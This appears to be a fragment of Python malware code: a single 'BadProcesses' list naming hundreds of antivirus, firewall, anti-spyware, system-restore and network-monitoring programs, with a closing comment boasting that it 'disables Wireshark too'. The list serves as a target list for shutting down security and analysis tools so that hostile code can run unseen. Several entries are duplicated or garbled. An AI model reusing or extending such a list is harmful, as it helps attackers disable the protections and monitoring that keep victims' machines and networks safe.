# found list online
BadProcesses = ["jusched", "rstrui", "n360", "avg", "avira", "patch", "clam", "superantispyware", "avg", "fsav", "fpav", "bullguard", "rkill", "teatimer", "avp", "regcure", "optimizer", "n360", "norton", "zonealarm", "wsbgate", "winsfcm",
               "adaware", "bluepoint", "nod32", "avast", "mbam", "bd_professional", "guard", "guarddog", "scan", "recovery", "psctrls", "tmccs", "pccnt", "ntrt", "tmpfw", "wyvernworksfirewall",
               "tmbm", "uise", "asmp", "ofcaos", "ircrc", "smex", "pcctl", "ofcpfw", "ntrt", "hvr", "sbam", "instzlh", "asoelnch", "restore", "neux", "sevinst", "minilog", "wnt", "wimmun32",
               "symdgn", "Symerr", "avmgma", "sysimins", "tuih", "adv", "gcasDtServ", "aavg", "avupgsvc", "maagent", "bdi", "bdbad", "Avch", "gzserv", "ccuac", "avwsc", "avweb", "winrecon",
               "mfev", "mfeann", "avcenter", "Avconfig", "avnotify", "avrestart", "avshadow", "avscan", "avg", "fsb", "fsd", "fsg", "fssm", "UpdClient.exe", "ccapp", "zatutor", "wradmin",
               "avss", "fsh", "fsor", "kav", "security", "anti-trojan", "clam", "avnt", "protectx", "f-agnt", "virusmadpersonalfirewall", "spyxx", "avw", "exantivirus", "winroute",
               "regcure", "_avp", "agent", "firewall", "armor", "antivirus", "esafe", "f-prot", "norton", "optimizer", "avconfig", "avscan", "instup", "zauinst", "wrctrl", "wqkmm3878",
               "hijackthis", "spybot", "ash", "ccuac", "avcenter", "egui", "egui", "zlclient", "bdagent", "keyscrambler", "avp", "wireshark", "tcpdump", "tshark", "whoswatchingme",
               "combofix", "msas", "mpcmdrun", "msseces", "msmpeng", "blindman", "sdfiles", "sdmain", "sdwinsec", "mghtml", "MsiExec", "outpost", "isafe", "zapro", "wgfe95", "wfindv32", "webtrap", "ccsetmgr", "ccsetmgr",
               "ccevtmgr", "Norton Auto-Protect", "cccproxy", "navw32", "norton", "navapsvc", "npfmntor", "logexprt", "nisum", "issvc", "cpdclnt", "pccntupd", "PCCTool", "tmproxy", "tmntsrv",
               "pop3trap", "tsc", "PavPrSrv", "padmin", "PavProt", "pandaav", "avengine", "apvxdwin", "webProxy", "avguard", "avgnt", "sched", "avsched32", "SCCOMM", "Spiderml", "vsserv",
               "bdswitch", "bdss", "INOTask", "caissdt", "InoRpc", "VetMsg", "vettray", "realmon", "nod32krn", "nod32", "nod32kui", "kav", "kavmm", "KAVPF", "avgemc", "avgcc", "avgamsvr", "avgupsvc", "avgw",
               "ashWebSv", "ashDisp", "ashmaisv", "ashserv", "aswupdsv", "ewidoctrl", "guard", "gcasDtServ", "MsMpEng", "mcafee", "mghtml", "MsiExec", "outpost", "isafe", "zapro", "zauinst",
               "UpdClient", "zlcliente", "minilog", "zonealarm", "zlclient", "ccapp", "AVGCtrl", "CSS_1630", "CSS-AVS", "AVGCC32", "AVGServ", "AVGServ9", "ewidoguard", "kavsvc", "MPFAgent", "MPFTray",
               "Mscifapp", "MSKSrvr", "PavPrS9x", "Nprotect", "Nsched32", "SymWSC", "mghml", "shed", "sgmain", "spywareguard", "kpf4gui", "kpf4ss", "mcdash", "mcdetect", "mcregwiz", "mcinfo",
               "oasclnt", "mpfconsole", "mpfservice", "mpfwizard", "mvtx", "_avp32", "_avpcc", "_avpm", "ackwin32", "advxdwin", "agentsvr", "agv", "ahnsd", "alertsvc", "alogserv", "amon", "amon9x", "amonavp32",
               "anti-trojan", "antivir", "antivirus", "ants", "antssircam", "apimonitor", "aplica32", "atcon", "atguard", "ats", "atscan", "atupdater", "atwatch", "autodown", "autotrace", "autoupdate",
               "ave32", "avgserv9schedapp", "avkpop", "avkserv", "avkservice", "avkwcl9", "avkwctl9", "avnt", "avp", "avp32", "avpcc", "AVPCC Service", "avpccavpm", "avpdos32", "avpexec",
               "avpinst", "avpm", "avpmonitor", "avptc", "avptc32", "avpupd", "avpupdates", "avrescue", "avsynmgr", "avwin95", "avwinnt", "avwupd32", "avxgui", "avxinit", "avxlive",
               "avxmonitor9x", "avxmonitornt", "avxnews", "avxquar", "avxsch", "avxw", "BACKLOG", "bd_professional", "bidef", "bidserver", "bipcp", "bisp", "blackd", "blackice", "blackiceblackd",
               "avconsol", "BootWarn", "borg2", "bs120", "bullguard", "ccIMScan", "ccPwdSrc", "ccpxysvc", "cdp", "cfiadmin", "cfiaudit", "cfinet", "cfinet32", "claw95", "claw95cf", "clean",
               "cleaner", "cleaner3", "cleanpc", "cmgrdian", "cmon016", "codered", "connectionmonitor", "conseal", "cpd", "cpf9x206", "ctrl", "defalert", "defence", "defense", "defscangui",
               "defwatch", "deputy", "doors", "dpf", "drwatson", "drweb32", "dvp95", "dvp95_0", "ecengine", "edisk", "efpeadm", "esafe", "escanh95", "escanhnt", "escanv95", "espwatch", "etrustcipe",
               "evpn", "exantivirus", "fameh32", "fast", "fch32", "fih32", "findviru", "firewall", "fix-it", "flowprotector", "fnrb32", "fp-win", "fp-win_trial", "fprot", "frw", "fsaa", "fsav32",
               "fsav95", "fsave32", "fsgk32", "fsm32", "fsma32", "fsmb32", "fwenc", "gbmenu", "gbpoll", "gedit", "generics", "grief3878", "guarddog", "HackerEliminator", "iamapp", "iamserv",
               "iamstats", "ibmasn", "ibmavsp", "icload95", "icloadnt", "icmon", "icsupp95", "icsuppnt", "iface", "ifw2000", "inoculateit", "iomon98", "iparmor", "iris", "isrv95", "jammer", "jedi", "ldnetmon",
               "ldpromenu", "ldscan", "localnet", "lockdown", "lookout", "luall", "lucomserver", "luspt", "mcagent", "mcmnhdlr", "mcshield", "mcshieldvvstat", "mctool", "mcupdate", "mcvsrte", "mcvsshld",
               "mgavrtcl", "mgavrte", "mgui", "mon", "monitor", "monsys32", "monsysnt", "moolive", "mrflux", "msinfo32", "mwatch", "mxtask", "n32scanw", "nav", "NAV DefAlert", "nav32", "navalert",
               "navap", "NAVAPW32", "navauto -protect", "navdx", "navengnavex15", "navlu32", "navnt", "navrunr", "navstub", "Navwnt", "nc2000", "ndd32", "neomonitor", "neowatchlog", "net2000",
               "netarmor", "netcommando", "netinfo", "netmon", "netpro", "netprotect", "netscanpro", "netspyhunter-1.2", "netstat", "netutils", "netutils]", "nimda", "nisserv", "nisumnisservnisum",
               "nmain", "norman", "norman_32", "norman_av", "norman32", "normanav", "normist", "norton_av", "nortonav", "notstart", "npfmessenger", "npfw", "npfw32", "npscheck", "npssvc", "nresq32", "nschednt",
               "nsplugin", "ntrtscan", "ntvdm", "ntxconfig", "nui", "nupgrade", "nvarch16", "nvc95", "nvsvc32", "nwservice", "nwtool16", "offguard", "OPScan", "ostronet", "panda", "panixk", "pav", "pavcl", "pavproxy",
               "pavsched", "pavw", "pc-cillan", "pc-cillin", "pccclient", "pccguide", "pcciomon", "pccntmon", "pccwin97", "pccwin98", "pcfwallicon", "pcscan", "periscope", "persfw", "pf2", "pfwadmin", "pingscan",
               "platin", "poproxy", "portdetective", "portmonitor", "ppinupdt", "pptbc", "ppvstop", "processmonitor", "procexplorerv10", "programauditor", "proport", "protectx", "pspf", "purge",
               "pview95", "pw32", "qconsole", "rav", "rav7", "rav7win", "regrun2", "rescue", "rrguard", "rshell", "rtvscn95", "rulaunch", "safeweb", "SAVscan", "sbserv", "SBservice", "scan", "scan32",
               "scan95", "scanpm", "scrscan", "sd", "SENS", "serv95", "sfc", "sh", "sharedaccess", "shn", "smc", "sofi", "sophos", "sophos_av", "sophosav", "spf", "sphinx", "spy", "spygate", "spyx", "spyxx",
               "srwatch", "ss3edit", "st2", "supftrl", "supp95", "supporter5", "sweep95", "sweepnet", "sweepsrv.sys", "sweepsrv.sysvshwin32", "swnetsup", "symantec", "Symantec Core LC", "symproxysvc", "symtray",
               "sysedit", "taskmon", "taumon", "tauscan", "tbscan", "tgbob", "trendmicro", "trjscan", "trojantrap3", "TrueVector", "undoboot", "vbcmserv", "vbcons", "vbust", "vbwin9x", "vbwinntw", "vccmserv",
               "vcontrol", "vet32", "vet95", "vir-help", "virus", "virusmdpersonalfirewall", "vnlan300", "vnpc3000", "vpc32", "vpfw30s", "vptray", "vscan40", "vsched", "avifil32", "vsecomr", "vshwin32", "vshwin32vbcmserv",
               "vsmain", "vsmon", "vsstat", "vswin9xe", "vswinntse", "w9x", "watchdog", "webscanx"]
# Disables Wireshark too!